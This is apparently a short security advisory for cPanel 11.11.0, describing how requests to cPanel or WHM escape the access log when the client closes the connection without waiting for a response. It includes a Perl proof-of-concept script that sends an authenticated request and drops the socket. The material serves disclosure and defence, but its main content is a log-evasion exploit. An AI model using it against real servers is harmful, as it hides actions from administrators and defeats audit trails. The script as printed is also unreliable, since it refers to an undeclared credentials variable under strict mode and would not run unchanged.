cPanel 11.11.0-STABLE_16999 - bypass cPanel and WHM logging



DESCRIPTION


If a user made a request to cPanel or WHM, then immediately closed the connection without waiting for a response, the request would not be logged to the cPanel access log at /usr/local/cpanel/logs/access_log. Other logging appeared to remain fully functional, such as anything that would normally be written to the cPanel error_log, or to /var/log/secure (such as when the cpwrap applications were executed).


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

my $request = "GET /frontend/x3/index.html HTTP/1.1\r\n";
$request   .= "Host: localhost:2082\r\n";
$request   .= "Authorization: Basic $base64_creds\r\n\r\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2082',
    Proto    => 'tcp',
    Timeout  => '3',
);

print $sock $request;
close $sock;



IMPACT


Users could issue requests to cpsrvd that could go partially or entirely unlogged.